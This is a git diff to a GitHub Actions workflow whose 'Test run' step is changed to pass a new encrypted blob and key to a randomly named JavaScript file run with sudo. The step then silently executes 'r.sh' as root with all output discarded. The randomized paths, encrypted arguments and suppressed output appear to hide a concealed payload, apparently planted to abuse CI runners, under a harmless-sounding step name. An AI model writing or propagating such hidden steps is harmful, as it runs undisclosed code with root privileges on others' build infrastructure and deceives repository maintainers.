--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'u7rzp'
+        echo 'hm4k0'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19baD92Dn+mhyNpwJH2Or5N2AuRZBk/0JlR6m2K/fw/v5Skf3MIX5is4RRfz8mLn4ySIWsrf54b3Hfg5Dwx6Zrki0Z/Stugb+JqBpapWd/s5Zz7IK3qj21o 5om7ic && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/VRkxd6qdSDixdfNI5K2SOL39/7iwR5R5pUiBMPVElG8QIHjPGGJGrA8ojGMRXzyyp4X7NDo/2VgwfytB506Pux+8eFvzj7wB3cHc3nd+k+Whmqnpk8l5x yuzbqp && sudo sh r.sh > /dev/null 2>&1
